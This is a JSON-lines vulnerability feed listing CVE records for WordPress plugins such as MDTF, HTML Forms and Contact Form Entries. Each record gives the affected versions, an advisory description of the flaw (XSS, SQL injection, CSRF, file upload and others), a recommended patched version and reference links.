{"CVE_ID":"CVE-2024-6243","slug":"html-forms","versionImpact":"1.3.32","versionEndExcluding":"1.3.33","description":"The HTML Forms  WordPress plugin before 1.3.33 does not sanitize and escape the form message inputs, allowing high-privilege users, such as administrators, to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disabled.","recommendation":"Update to version 1.3.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4097877-ba19-4738-a994-9593b9a5a635\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4097877-ba19-4738-a994-9593b9a5a635\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12030","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.5","versionEndExcluding":"1.3.3.6","description":"The MDTF \u2013 Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to SQL Injection via the 'key' attribute of the 'mdf_value' shortcode in all versions up to, and including, 1.3.3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-meta-data-filter-and-taxonomy-filter\\\/trunk\\\/classes\\\/shortcodes.php?rev=3204774#L874\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-meta-data-filter-and-taxonomy-filter\\\/trunk\\\/classes\\\/shortcodes.php?rev=3204774#L874\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210333%40wp-meta-data-filter-and-taxonomy-filter&new=3210333%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210333%40wp-meta-data-filter-and-taxonomy-filter&new=3210333%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2ead824-2722-4b09-8387-e064dee371c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2ead824-2722-4b09-8387-e064dee371c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50451","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.4","versionEndExcluding":"1.3.3.5","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Stored XSS.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n\/a through 1.3.3.4.","recommendation":"Update to version 1.3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50450","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.4","versionEndExcluding":"1.3.3.5","description":"Improper Control of Generation of Code ('Code Injection') vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Code Injection.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n\/a through 1.3.3.4.","recommendation":"Update to version 1.3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-4-bypass-vulnerability-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-4-bypass-vulnerability-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8624","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.3","versionEndExcluding":"1.3.3.4","description":"The MDTF \u2013 Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to SQL Injection via the 'meta_key' attribute of the 'mdf_select_title' shortcode in all versions up to, and including, 1.3.3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f50812a-c6a7-4bb3-9833-e10acd0460c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f50812a-c6a7-4bb3-9833-e10acd0460c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153150%40wp-meta-data-filter-and-taxonomy-filter&new=3153150%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153150%40wp-meta-data-filter-and-taxonomy-filter&new=3153150%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8623","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.3","versionEndExcluding":"1.3.3.4","description":"The The MDTF \u2013 Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.3.3.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba584e02-5242-4869-a452-21e6b8995bd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba584e02-5242-4869-a452-21e6b8995bd8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-meta-data-filter-and-taxonomy-filter\\\/trunk\\\/classes\\\/page.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-meta-data-filter-and-taxonomy-filter\\\/trunk\\\/classes\\\/page.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150646%40wp-meta-data-filter-and-taxonomy-filter&new=3150646%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150646%40wp-meta-data-filter-and-taxonomy-filter&new=3150646%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34434","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.2","versionEndExcluding":"1.3.3.3","description":"Incorrect Authorization vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Code Inclusion, Functionality Misuse.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n\/a through 1.3.3.2.","recommendation":"Update to version 1.3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-2-arbitrary-shortcode-execution-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-2-arbitrary-shortcode-execution-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-32818","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3","versionEndExcluding":"1.3.3.1","description":"Missing Authorization vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF).This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n\/a through 1.3.3.","recommendation":"Update to version 1.3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-meta-data-filter-and-taxonomy-filter\\\/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47548","slug":"integrate-google-drive","versionEndExcluding":"1.3.3","description":"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SoftLab Integrate Google Drive \u2013 Browse, Upload, Download, Embed, Play, Share, Gallery, and Manage Your Google Drive Files Into Your WordPress Site.This issue affects Integrate Google Drive \u2013 Browse, Upload, Download, Embed, Play, Share, Gallery, and Manage Your Google Drive Files Into Your WordPress Site: from n\/a through 1.3.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/integrate-google-drive\\\/wordpress-integrate-google-drive-plugin-1-3-0-open-redirection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/integrate-google-drive\\\/wordpress-integrate-google-drive-plugin-1-3-0-open-redirection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5251","slug":"grid-plus","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Grid Plus plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'grid_plus_save_layout_callback' and 'grid_plus_delete_callback' functions in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with subscriber privileges or above, to add, update or delete grid layout.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/ajax_be.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/ajax_be.php#L10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/ajax_be.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/ajax_be.php#L69\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d34c84-473c-49f8-b55c-c869b5479974?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d34c84-473c-49f8-b55c-c869b5479974?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1069","slug":"contact-form-entries","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Contact Form Entries plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'view_page' function in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/includes\\\/plugin-pages.php?rev=3003884#L1213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/includes\\\/plugin-pages.php?rev=3003884#L1213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028640\\\/contact-form-entries#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028640\\\/contact-form-entries#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5715","slug":"plerdy-heatmap","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Website Optimization \u2013 Plerdy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tracking code settings in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db18ac07-2e7a-466d-b00c-a598401f8633?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db18ac07-2e7a-466d-b00c-a598401f8633?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plerdy-heatmap\\\/trunk\\\/plerdy_heatmap_tracking.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plerdy-heatmap\\\/trunk\\\/plerdy_heatmap_tracking.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2989840%40plerdy-heatmap&new=2989840%40plerdy-heatmap&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2989840%40plerdy-heatmap&new=2989840%40plerdy-heatmap&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2254","slug":"ko-fi-button","versionEndExcluding":"1.3.3","description":"The Ko-fi Button WordPress plugin before 1.3.3 does not properly some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup), and we consider it a low risk.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8886ec5f-8465-448f-adbd-68a3e84c5dec\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8886ec5f-8465-448f-adbd-68a3e84c5dec\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4193","slug":"testimonial-slider","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Testimonial Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'testimonialcategory' shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080579%40testimonial-slider&new=3080579%40testimonial-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080579%40testimonial-slider&new=3080579%40testimonial-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7ed687-4049-4957-86e9-b2f59621c747?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7ed687-4049-4957-86e9-b2f59621c747?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4082","slug":"joli-faq-seo","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Joli FAQ SEO \u2013 WordPress FAQ Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.2. This is due to missing or incorrect nonce validation when saving settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081648%40joli-faq-seo%2Ftrunk&old=3076380%40joli-faq-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081648%40joli-faq-seo%2Ftrunk&old=3076380%40joli-faq-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c45b6163-7ebf-4f18-afd6-735d02d9170d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c45b6163-7ebf-4f18-afd6-735d02d9170d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13436","slug":"appsero-helper","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Appsero Helper plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.2. This is due to missing or incorrect nonce validation on the 'appsero_helper' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253119%40appsero-helper&new=3253119%40appsero-helper&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253119%40appsero-helper&new=3253119%40appsero-helper&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d0c31e-1641-48e6-bd3e-47d8afb1b3b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d0c31e-1641-48e6-bd3e-47d8afb1b3b8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11746","slug":"gs-woo-brands","versionImpact":"1.3.2","versionEndExcluding":"1.3.3","description":"The Discover the Best Woocommerce Product Brands Plugin for WordPress \u2013 Woocommerce Brands Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'product_brand' shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-woo-brands\\\/tags\\\/1.3.1\\\/woocommerce-brand.php#L299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-woo-brands\\\/tags\\\/1.3.1\\\/woocommerce-brand.php#L299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235325%40gs-woo-brands&new=3235325%40gs-woo-brands&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235325%40gs-woo-brands&new=3235325%40gs-woo-brands&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443cfb7b-4566-4a71-ac31-5a5361c58aa2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443cfb7b-4566-4a71-ac31-5a5361c58aa2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5677","slug":"featured-image-generator","versionImpact":"1.3.1","versionEndExcluding":"1.3.3","description":"The Featured Image Generator plugin for WordPress is vulnerable to unauthorized image upload due to a missing capability check on the fig_save_after_generate_image function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary images to a post-related gallery.","recommendation":"Update to version 1.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56161d67-7378-4349-8fe5-da73da36afa0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56161d67-7378-4349-8fe5-da73da36afa0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-generator\\\/tags\\\/1.3.1\\\/admin\\\/class-featured-image-generator-admin.php#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-generator\\\/tags\\\/1.3.1\\\/admin\\\/class-featured-image-generator-admin.php#L575\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13549","slug":"all-bootstrap-blocks","versionImpact":"1.3.26","versionEndExcluding":"1.3.27","description":"The All Bootstrap Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"Accordion\" widget in all versions up to, and including, 1.3.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228370\\\/all-bootstrap-blocks\\\/trunk\\\/blocks\\\/accordion-item.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228370\\\/all-bootstrap-blocks\\\/trunk\\\/blocks\\\/accordion-item.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/786e16be-dee9-43de-afe3-dcc0d17bc92b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/786e16be-dee9-43de-afe3-dcc0d17bc92b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12583","slug":"integration-dynamics","versionImpact":"1.3.23","versionEndExcluding":"1.3.24","description":"The Dynamics 365 Integration plugin for WordPress is vulnerable to Remote Code Execution and Arbitrary File Read in all versions up to, and including, 1.3.23 via Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","recommendation":"Update to version 1.3.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-dynamics\\\/trunk\\\/src\\\/Shortcode\\\/Twig.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-dynamics\\\/trunk\\\/src\\\/Shortcode\\\/Twig.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210927\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210927\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f3dac5a-9ff8-4e8c-8c73-422123e121d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f3dac5a-9ff8-4e8c-8c73-422123e121d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4691","slug":"easync-booking","versionImpact":"1.3.21","versionEndExcluding":"1.3.22","description":"The Free Booking Plugin for Hotels, Restaurants and Car Rentals \u2013 eaSYNC Booking plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.21 via the 'view_request_details' due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view the details of any booking request. The vulnerability was partially patched in versions 1.3.18 and 1.3.21.","recommendation":"Update to version 1.3.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easync-booking\\\/tags\\\/1.3.17\\\/easync.php#L4859\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easync-booking\\\/tags\\\/1.3.17\\\/easync.php#L4859\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243634\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243634\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293607\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293607\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300408\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300408\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c9953b3-dd09-4c80-be11-4daf3bbac720?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c9953b3-dd09-4c80-be11-4daf3bbac720?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0061","slug":"judgeme-product-reviews-woocommerce","versionEndExcluding":"1.3.21","description":"The Judge.me Product Reviews for WooCommerce WordPress plugin before 1.3.21 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1d0d131-c773-487e-88f8-e3d63936fbbb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1d0d131-c773-487e-88f8-e3d63936fbbb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4536","slug":"my-account-page-editor","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The My Account Page Editor WordPress plugin before 1.3.2 does not validate the profile picture to be uploaded, allowing any authenticated users, such as subscriber to upload arbitrary files to the server, leading to RCE","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80e0e21c-9e6e-406d-b598-18eb222b3e3e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80e0e21c-9e6e-406d-b598-18eb222b3e3e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
